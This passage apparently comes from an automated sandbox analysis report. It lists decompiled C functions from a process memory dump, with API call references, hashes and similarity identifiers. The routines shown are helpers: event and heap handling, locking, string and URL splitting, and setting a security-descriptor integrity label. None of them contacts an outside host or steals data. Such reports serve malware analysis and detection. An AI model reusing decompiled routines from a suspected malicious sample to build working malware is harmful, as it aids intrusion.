                            • Instruction ID: 0ad5d51a261e26acabf67cb6db4e9f5687a1cc65f517d581c85c0f0bd5b7b6c5
                            • Opcode Fuzzy Hash: b61494c52c1b002bf01b979ad2f6a2527f441675ed218f7ba919a219ba28b780
                            • Instruction Fuzzy Hash: 9401A23210010EB7C7623BA8ACC9BBE3A69DF84395F144022FB155A151DF758A46DBA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CFA457(void* __esi) {
                            				struct _SECURITY_ATTRIBUTES* _v4;
                            				void* _t8;
                            				void* _t10;
                            
                            				_v4 = 0;
                            				memset(__esi, 0, 0x38);
                            				_t8 = CreateEventA(0, 1, 0, 0);
                            				 *(__esi + 0x1c) = _t8;
                            				if(_t8 != 0) {
                            					_t10 = CreateEventA(0, 1, 1, 0);
                            					 *(__esi + 0x20) = _t10;
                            					if(_t10 == 0) {
                            						CloseHandle( *(__esi + 0x1c));
                            					} else {
                            						_v4 = 1;
                            					}
                            				}
                            				return _v4;
                            			}






                            APIs
                            • memset.NTDLL ref: 00CFA465
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 00CFA47A
                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CFA487
                            • CloseHandle.KERNEL32(?), ref: 00CFA499
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: CreateEvent$CloseHandlememset
                            • String ID:
                            • API String ID: 2812548120-0
                            • Opcode ID: 4ae28b96a61682ffcccb2c3f33e40370c18e5c17956bc84d0f82f4d97718a3fa
                            • Instruction ID: 7db1edcdf9eefcb81c262e3e7a69b9877ce51a12b8fd307d092144fc03125371
                            • Opcode Fuzzy Hash: 4ae28b96a61682ffcccb2c3f33e40370c18e5c17956bc84d0f82f4d97718a3fa
                            • Instruction Fuzzy Hash: 03F05EF110430CBFD3106F26DCC4D3BFBACEB45298B11992EF24682111DA71A8158A76
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF20BE() {
                            				void* _t1;
                            				intOrPtr _t5;
                            				void* _t6;
                            				void* _t7;
                            				void* _t11;
                            
                            				_t1 =  *0xcfd26c; // 0x270
                            				if(_t1 == 0) {
                            					L8:
                            					return 0;
                            				}
                            				SetEvent(_t1);
                            				_t11 = 0x7fffffff;
                            				while(1) {
                            					SleepEx(0x64, 1);
                            					_t5 =  *0xcfd2b8; // 0x0
                            					if(_t5 == 0) {
                            						break;
                            					}
                            					_t11 = _t11 - 0x64;
                            					if(_t11 > 0) {
                            						continue;
                            					}
                            					break;
                            				}
                            				_t6 =  *0xcfd26c; // 0x270
                            				if(_t6 != 0) {
                            					CloseHandle(_t6);
                            				}
                            				_t7 =  *0xcfd238; // 0x2d80000
                            				if(_t7 != 0) {
                            					HeapDestroy(_t7);
                            				}
                            				goto L8;
                            			}









                            APIs
                            • SetEvent.KERNEL32(00000270,00000001,00CF91D0), ref: 00CF20C9
                            • SleepEx.KERNEL32(00000064,00000001), ref: 00CF20D8
                            • CloseHandle.KERNEL32(00000270), ref: 00CF20F9
                            • HeapDestroy.KERNEL32(02D80000), ref: 00CF2109
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: CloseDestroyEventHandleHeapSleep
                            • String ID:
                            • API String ID: 4109453060-0
                            • Opcode ID: b0bb3febb851ff07feb4fc55fd3c81c4cd2964797bcc6b6c0a0cd08a669789cd
                            • Instruction ID: def0fb77118b1d5f19d7d16388a98b47220d0046da6b310a7dc953ba5980a447
                            • Opcode Fuzzy Hash: b0bb3febb851ff07feb4fc55fd3c81c4cd2964797bcc6b6c0a0cd08a669789cd
                            • Instruction Fuzzy Hash: F7F03031705319D7DB609B399D88B7EBBA9EB047517044110BE26D72A9CF70CD41E6A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E00CF972C(void** __esi) {
                            				char* _v0;
                            				intOrPtr _t4;
                            				intOrPtr _t6;
                            				void* _t8;
                            				intOrPtr _t11;
                            				void* _t12;
                            				void** _t14;
                            
                            				_t14 = __esi;
                            				_t4 =  *0xcfd324; // 0x31795b0
                            				__imp__(_t4 + 0x40);
                            				while(1) {
                            					_t6 =  *0xcfd324; // 0x31795b0
                            					_t1 = _t6 + 0x58; // 0x0
                            					if( *_t1 == 0) {
                            						break;
                            					}
                            					Sleep(0xa);
                            				}
                            				_t8 =  *_t14;
                            				if(_t8 != 0 && _t8 != 0xcfd030) {
                            					HeapFree( *0xcfd238, 0, _t8);
                            				}
                            				_t14[1] = E00CF203C(_v0, _t14);
                            				_t11 =  *0xcfd324; // 0x31795b0
                            				_t12 = _t11 + 0x40;
                            				__imp__(_t12);
                            				return _t12;
                            			}











                            APIs
                            • RtlEnterCriticalSection.NTDLL(03179570), ref: 00CF9735
                            • Sleep.KERNEL32(0000000A,?,00CF5068), ref: 00CF973F
                            • HeapFree.KERNEL32(00000000,00000000,?,00CF5068), ref: 00CF9767
                            • RtlLeaveCriticalSection.NTDLL(03179570), ref: 00CF9783
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: bcda50e15123b9121a11a81b4a28bf5e7c56fdf79b4dec7e1dbaeb28c100b493
                            • Instruction ID: d88f760f58b2bdb1dbcecbd4dff5c6c93d0b3a8b3e5579a431731d2d01f6e010
                            • Opcode Fuzzy Hash: bcda50e15123b9121a11a81b4a28bf5e7c56fdf79b4dec7e1dbaeb28c100b493
                            • Instruction Fuzzy Hash: 66F03471610208DBDB50AF68DEC8F3A37F9AB14741B114015F607C62A1CA30ED4ADA17
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E00CF59EE() {
                            				void* _v0;
                            				void** _t3;
                            				void** _t5;
                            				void** _t7;
                            				void** _t8;
                            				void* _t10;
                            
                            				_t3 =  *0xcfd324; // 0x31795b0
                            				__imp__( &(_t3[0x10]));
                            				while(1) {
                            					_t5 =  *0xcfd324; // 0x31795b0
                            					_t1 =  &(_t5[0x16]); // 0x0
                            					if( *_t1 == 0) {
                            						break;
                            					}
                            					Sleep(0xa);
                            				}
                            				_t7 =  *0xcfd324; // 0x31795b0
                            				_t10 =  *_t7;
                            				if(_t10 != 0 && _t10 != 0xcfe836) {
                            					HeapFree( *0xcfd238, 0, _t10);
                            					_t7 =  *0xcfd324; // 0x31795b0
                            				}
                            				 *_t7 = _v0;
                            				_t8 =  &(_t7[0x10]);
                            				__imp__(_t8);
                            				return _t8;
                            			}










                            APIs
                            • RtlEnterCriticalSection.NTDLL(03179570), ref: 00CF59F7
                            • Sleep.KERNEL32(0000000A,?,00CF5068), ref: 00CF5A01
                            • HeapFree.KERNEL32(00000000,?,?,00CF5068), ref: 00CF5A2F
                            • RtlLeaveCriticalSection.NTDLL(03179570), ref: 00CF5A44
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: b9463f89163dc0718b5c286d3f4266d23f67e27de38b89aa7a000e43cd3f7af8
                            • Instruction ID: 4602a34fcf4eda8b7b4cbf481246e1c6fdd3e6722fa4c195d850ab5ddfccf31f
                            • Opcode Fuzzy Hash: b9463f89163dc0718b5c286d3f4266d23f67e27de38b89aa7a000e43cd3f7af8
                            • Instruction Fuzzy Hash: 32F0B274600244DFE758DB28DE99F3937E6AB28316B164118E703C72B0CA30AD59DA13
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E00CF61FB(void* __eax, char _a4) {
                            
                            				 *0xcfd2b0 =  *0xcfd2b0 & 0x00000000;
                            				_push(0);
                            				_push(" 'H");
                            				_push(1);
                            				_t1 =  &_a4; // 0x4d283a53
                            				_push( *_t1);
                            				 *0xcfd2a8 = 0xc;
                            				L00CF57E9();
                            				return __eax;
                            			}




                            APIs
                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(S:(M,00000001, 'H,00000000), ref: 00CF6219
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: DescriptorSecurity$ConvertString
                            • String ID: 'H$S:(M
                            • API String ID: 3907675253-3832604773
                            • Opcode ID: 10747365bd7e7e3a2037cc39fa596f9dab5deabd6dafdbe78c99a1ec438a5bb3
                            • Instruction ID: e7735ca32c8ca4544c55879f2bd3dd136322454dc53f2c28b6db4a1875b86636
                            • Opcode Fuzzy Hash: 10747365bd7e7e3a2037cc39fa596f9dab5deabd6dafdbe78c99a1ec438a5bb3
                            • Instruction Fuzzy Hash: 76C08C74240300ABE210BF00CC02F2A7652B300700F100104F301200E0C3F08404E597
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E00CF552D(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                            				intOrPtr* _v8;
                            				void* _t17;
                            				intOrPtr* _t22;
                            				void* _t27;
                            				char* _t30;
                            				void* _t33;
                            				void* _t34;
                            				void* _t36;
                            				void* _t37;
                            				void* _t39;
                            				int _t42;
                            
                            				_t17 = __eax;
                            				_t37 = 0;
                            				__imp__(_a4, _t33, _t36, _t27, __ecx);
                            				_t2 = _t17 + 1; // 0x1
                            				_t28 = _t2;
                            				_t34 = E00CF8D59(_t2);
                            				if(_t34 != 0) {
                            					_t30 = E00CF8D59(_t28);
                            					if(_t30 == 0) {
                            						E00CF677C(_t34);
                            					} else {
                            						_t39 = _a4;
                            						_t22 = E00CFA89A(_t39);
                            						_v8 = _t22;
                            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                            							_a4 = _t39;
                            						} else {
                            							_t26 = _t22 + 2;
                            							_a4 = _t22 + 2;
                            							_t22 = E00CFA89A(_t26);
                            							_v8 = _t22;
                            						}
                            						if(_t22 == 0) {
                            							__imp__(_t34, _a4);
                            							 *_t30 = 0x2f;
                            							 *((char*)(_t30 + 1)) = 0;
                            						} else {
                            							_t42 = _t22 - _a4;
                            							memcpy(_t34, _a4, _t42);
                            							 *((char*)(_t34 + _t42)) = 0;
                            							__imp__(_t30, _v8);
                            						}
                            						 *_a8 = _t34;
                            						_t37 = 1;
                            						 *_a12 = _t30;
                            					}
                            				}
                            				return _t37;
                            			}















                            APIs
                            • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?,?,00000000), ref: 00CF5539
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                              • Part of subcall function 00CFA89A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00CF5567,00000000,00000001,00000001,?,?,00CF8CFF,?,?,?,?,00000102), ref: 00CFA8A8
                              • Part of subcall function 00CFA89A: StrChrA.SHLWAPI(?,0000003F,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?,?,00000000,00000000), ref: 00CFA8B2
                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?), ref: 00CF5597
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00CF55A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00CF55B3
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                            • String ID:
                            • API String ID: 3767559652-0
                            • Opcode ID: 6f56c700c8c23c6942869f9156fca571dbf305673536638212da9a968d772ac6
                            • Instruction ID: bf39c6a1587cb602e58ed469acff9439deda26103ab1c37e3bb1384246d6e1c5
                            • Opcode Fuzzy Hash: 6f56c700c8c23c6942869f9156fca571dbf305673536638212da9a968d772ac6
                            • Instruction Fuzzy Hash: 3521C07250061DEFCB426FB5D888BBEBFB99F06380B144051FB059B211DB31DA0197A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF1FE0(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                            				void* _v8;
                            				void* _t18;
                            				int _t25;
                            				int _t29;
                            				int _t34;
                            
                            				_t29 = lstrlenW(_a4);
                            				_t25 = lstrlenW(_a8);
                            				_t18 = E00CF8D59(_t25 + _t29 + _t25 + _t29 + 2);
                            				_v8 = _t18;
                            				if(_t18 != 0) {
                            					_t34 = _t29 + _t29;
                            					memcpy(_t18, _a4, _t34);
                            					_t10 = _t25 + 2; // 0x2
                            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                            				}
                            				return _v8;
                            			}









                            APIs
                            • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0317936C,?,00CF5D0B,004F0053,0317936C,?,?,?,?,?,?,00CF2885), ref: 00CF1FF0
                            • lstrlenW.KERNEL32(00CF5D0B,?,00CF5D0B,004F0053,0317936C,?,?,?,?,?,?,00CF2885), ref: 00CF1FF7
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00CF5D0B,004F0053,0317936C,?,?,?,?,?,?,00CF2885), ref: 00CF2017
                            • memcpy.NTDLL(74B069A0,00CF5D0B,00000002,00000000,004F0053,74B069A0,?,?,00CF5D0B,004F0053,0317936C), ref: 00CF202A
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: lstrlenmemcpy$AllocateHeap
                            • String ID:
                            • API String ID: 2411391700-0
                            • Opcode ID: df510b93fc89e582cbe09554f78a33beada0cc1a072543df46b06cfdbe838049
                            • Instruction ID: f49e7e3ffb18d275510499d1f7b4609a879ca655fdebd8373541b106d7baa67f
                            • Opcode Fuzzy Hash: df510b93fc89e582cbe09554f78a33beada0cc1a072543df46b06cfdbe838049
                            • Instruction Fuzzy Hash: 0BF03C3690011DBB8F119BA9DC85DAE7BACEF482547154462BA0497111EB31EA149BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,00000000,00000000,00CF1F32,616D692F,00000000), ref: 00CF277F
                            • lstrlen.KERNEL32(?), ref: 00CF2787
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • lstrcpy.KERNEL32(00000000,?), ref: 00CF279E
                            • lstrcat.KERNEL32(00000000,?), ref: 00CF27A9
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                            • String ID:
                            • API String ID: 74227042-0
                            • Opcode ID: a974f24073d26aaf51d0ff5e304f1cf8e1eba465b8b00855e32e1936b68dcf84
                            • Instruction ID: f47e917162818cc93d707a909521e3701a66a20a823c271ef3f499e49176bbcc
                            • Opcode Fuzzy Hash: a974f24073d26aaf51d0ff5e304f1cf8e1eba465b8b00855e32e1936b68dcf84
                            • Instruction Fuzzy Hash: CEE09233504625EB87126BA4EC48DAFBFA9FF883207044916F61493124CB31C815CF92
                            Uniqueness

                            Uniqueness Score: -1.00%